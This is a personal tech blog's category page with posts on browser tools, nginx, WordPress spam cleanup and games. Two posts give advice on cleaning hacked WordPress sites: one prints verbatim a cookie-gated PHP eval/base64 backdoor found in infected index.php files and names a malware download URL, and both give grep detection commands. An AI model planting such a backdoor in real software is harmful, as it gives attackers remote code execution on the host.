Jason Cosper

Category: Geekery

  • I ♥ SendTab

    Because I use multiple computers over the course of my day, I am seriously losing my shit over how awesome SendTab is…

    Now, instead of sending myself reminder emails to check out a site — which I do sort of a lot — I can hit a button and the page will be waiting for me in whatever browser I decide to fire it off to. It’s like living in the future!

    All I need at this point is an iOS Twitter client with SendTab support and I’ll be a totally happy nerd. They’ve got an API, so I guess it’s only a matter of time, right?

  • Switching Things Up

    Yesterday, I quietly switched this site over from its old Apache server to the much more lightweight combination of nginx + XCache.  As someone who has worked with Apache servers for roughly 14 years now, the thought of moving my personal site to a server environment that I didn’t know how to troubleshoot in great detail was terrifying.  But you start becoming irrelevant the second you allow yourself to stop learning new things.  So I took a play from the Ol’ Jack Burton playbook and said “what the hell?“.

    Surprisingly, it’s still chugging along without any complaints.  Most of the thanks for that goes to DreamHost‘s default nginx config and easy to follow tutorial tho.

    All I really needed to do to get it going was:

    • Select the server from the Private Server configuration menu in the DreamHost web panel.
    • Wait for a configuration update to run on the server.
    • Flush my local DNS cache.
    • Check the HTTP headers to verify I was seeing the right server.
    • Comment out a few conflicting mod_rewrite rules from .htaccess.
    • Copy and paste new rules into my personal site config file.

    And while that might seem like that list had a bunch of stuff in it, I can honestly say that it took no more than 30 minutes to make those changes.

    The only weird thing that has happened so far is that it had a weird memory spike last night — but that dropped off this morning for no discernible reason.  Since everything has been level after that, I guess I’ll have to keep an eye on my graphs and make sure it’s not a nightly thing…

    P.S. Since I’ve never been one to leave “good enough” alone, I’m going to keep making tweaks (and maybe start piling on a few more active sites) to see what nginx can do. Expect more nerdy updates on this eventually.

  • Left 4 Dead: NES Edition

    The only thing that makes me happier than knowing that this exists is knowing that it should be available for download in January of 2010. Anyone have any suggestions for good NES emulators for Linux?

  • Rekismet

    After examining a customer’s 150,000+ row wp_comments table at work yesterday, I realized that they’d managed to let WordPress approve a massive amount of spam.  Since there was no way I was going back thru all of that by hand, I knew that I had to come up with something clever.

    Fortunately, running your already approved comments thru Akismet is pretty easy.  Well, that might be a bit disingenuous. It’s easy for the geeky types that are comfortable with the MySQL command line and raw queries.  So if you manage to fall into that category, feel free to give this a go…

    1. Fire up your favorite MySQL management tool and feed the following command to your WordPress database:
      update wp_comments set comment_approved=’0′ where comment_approved=’1′;
      This tells WordPress to take any comment already flagged as “approved” and set it to “pending”.
    2. Visit “Comments” in your WordPress dashboard.  You should notice that you’ve got a bunch of comments under “Pending”.
    3. So long as you have Akismet installed, you should have a button marked “Check for Spam”.  Click it.
    4. This step is going to require some patience.  You’ll need to wait while Akismet does its thing.  This means chilling out while watching your browser’s “loading” animation spin for a little bit.
      1. If you have a lot of comments — and we’re talking about thousands — you might run into your server’s PHP execution timeout. You’ll know this has happened when you see either a 404 or aren’t redirected back to the “Comments” page.  Don’t panic.
      2. If you run into a timeout, simply press “Back” in your browser and click “Check for Spam” again.  When the number of comments listed under “Pending” stops decreasing, you’re really close to being done!
    5. Go back to the MySQL management tool you used in step one and give it one last command:
      update wp_comments set comment_approved=’1′ where comment_approved=’0′;
      This takes the “pending” comments and sets them back to “approved”.
    6. Congratulations!  Your comments are now much tidier and you’ve helped stamp out the spammers who’ve gotten past your defenses.  Since your copy of Akismet has just done a bunch of heavy lifting, you might want to consider giving it a bit of a rest by implementing something like Hashcash as your first line of defense. When it comes to fighting spam, they’re a great combination.

    If I can hack together a way to work around the PHP execution timeout issue, I’ll do my best to make this into a simple to use plugin.  Since I’ve got a lot on my plate right now, I’d prefer it if the lazyweb could beat me to getting that done.  Any takers?

  • Just Another Magic Monday

    Have you recently found yourself editing a post on your WordPress install only to find yourself facing the following prompt?

    The server at Magic requires a username and password.

    Well my friend, you’ve been hacked.  Apparently this has something to do with the cross-site scripting (XSS) bug addressed with the WordPress 2.8.2 and 2.8.3 updates.

    I’ve uncreatively dubbed this little baddie “The Magic Hack” and there appears to be a simple way to clear it up.  As it stands, the only file that I’ve seen get affected by this is in “wp-includes/vars.php”.  So if your copy of that file looks nothing like the one available over in the WordPress subversion repository, replace yours with a fresh copy, stat.

    In fact, it’d probably be a better idea to upgrade your blog to the most recent version of WordPress using the extended upgrade instructions over on the WordPress Codex.  So yeah, do that instead.

    Oh, and if you’re still seeing that prompt after updating “wp-includes/vars.php”, let me know and I’ll update the post when I dig up some more info.

    Update: Some people are seeing the hack showing up outside of “wp-includes/vars.php”. If you have SSH access to your server, you should be able to pick out the infected files rather quickly by doing a recursive grep from your site’s root directory:

    grep -r -l gzinflate .

    This will show you just the filenames where the string “gzinflate” is found. If you want to see the code that grep finds — to provide yourself with a little context — just leave the “-l” switch off of the command.

    Should you not have SSH access to the server where your copy of WordPress is installed, I suggest writing your host’s support team. Any host worth their salt wouldn’t mind running the command above and giving you the results.

    And if you host your WordPress sites in a Windows based server environment — which doesn’t normally allow for commands like grep — do yourself a favor and go get a real host… ;)

  • Left 4 Dead 2: Electric Boogaloo

    Squee! My all-time favorite multiplayer FPS is getting a sequel! And melee weapons! This has managed to make me so excited that I can’t seem to stop using exclamation points!

    Oh. Wait. Yes I can. *whew* That was a close one. Last time I got stuck like that it took me a week to snap out of it.

    I’m still pretty psyched tho. November 17th can’t come soon enough…

    Actually, let’s not shit ourselves — it’ll probably be here before you realize it. So if you pre-order the Xbox 360 version on Amazon now and add me on Xbox Live, we’ll be able to kill zombies without having to deal with the condescending twats they seem to employ behind the counter at Gamestop.

    (more…)

  • GrowlMail and Safari 4

    While I’m really happy with the Safari 4 beta, I was a little dismayed to find that Mail.app started dying shortly after the update. The system’s complaint was that GrowlMail was causing a problem that made Mail.app become hella unstable.

    So what was their suggestion?  Turn GrowlMail off until there was an update for it.  And that’s all well and good for most people — but since I hide my dock and am expected to pay at least a little bit of attention to my mail client at work, I’d rather not wait around for a fix.

    Fortunately, the Growl forums came up with a solution that requires only cutting and pasting a simple line into Terminal.app:

    defaults write com.apple.mail GMSummaryMode -int 2

    This can also be achieved by setting GrowlMail to display summaries instead of message excerpts.  If Mail.app keeps crashing on you tho, it’s a little hard to do that.

    So if you need a fix, now you’ve got one.

  • Goodbye Horses

    So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed.  When visiting an infected site, most folks are being prompted to download: 

    http://gvatemal.biz/pfd/spl/pdf.pdf

    Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.

    So how do you find out if your install has been hit?  Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php

    <?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>

    If you see that floating around, get rid of it!  Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.

    Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:

    grep -R 0bdcf3981272c15a /home/user/example.com/*

    Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed.  Give that command a few minutes to run and you should get a path of where that code snippet can be found.  All you have to do at that point is purge it and clear any cache you might have on your WP install.

    Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.

    All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.

  • Photoshoppery in the Real World

    Photoshop

    Pretty much every celebrity photo — save for the unflattering ones on gossip sites — is so heavily touched up nowadays that this bit of adbusting from Germany is freaking genius as far as I’m concerned.  And I don’t know about you, but all the detail that they put into this (like the layer list) really makes me wish that I’d see stuff like this pop up in the US more often.

  • Review: Nixon Nomadic Headphones

    I told myself that I was going to wait for the reviews before I rushed out and bought myself a pair of Nixon Nomadic headphones. Sure, the product page made them look dead sexy — but could they possibly live up to the marketing hype?

    2 weeks on, my patience was wearing thin. Not a single word had surfaced and I was getting antsy. No. I wasn’t going to give in. If they were good, I’d hear about it eventually. Patience is a virtue, and I was going to stick to my original plan.

    A week later, I had them in my grubby paws. Fuck patience. My want overruled any plans I might have had. And while I might be weak, at least I had a shiny new way to listen to music.

    So how are they? Surprisingly good, actually. The first handful of tracks that I listened to had the right amount of punch along with just enough nuance. Even the audiobook that I’m currently consuming sounded great.

    On top of that, they’re solidly built. The ball and socket joints manage to swivel freely while not getting too squirrelly and the memory foam ear pads contour quite nicely. The fact that the headphone cable detaches for easy packing and the right ear has an independent volume control built-in are just icing on the cake.

    Oh, did I mention these were iPhone compatible? No? Well, they are. And the mic, I’ve been told, sounds fantastic. Like a heavy one-inch button, there’s really no fumbling for it to change tracks or answer calls. Your hand just sort of gravitates to it.

    Other than feeling just a little tight on my Charlie Brown sized head, these are pretty much flawless. They’re seriously my new favorite headphones — and well worth the $120 I shelled out for them. If you’ve got the cash to burn, I highly recommend them.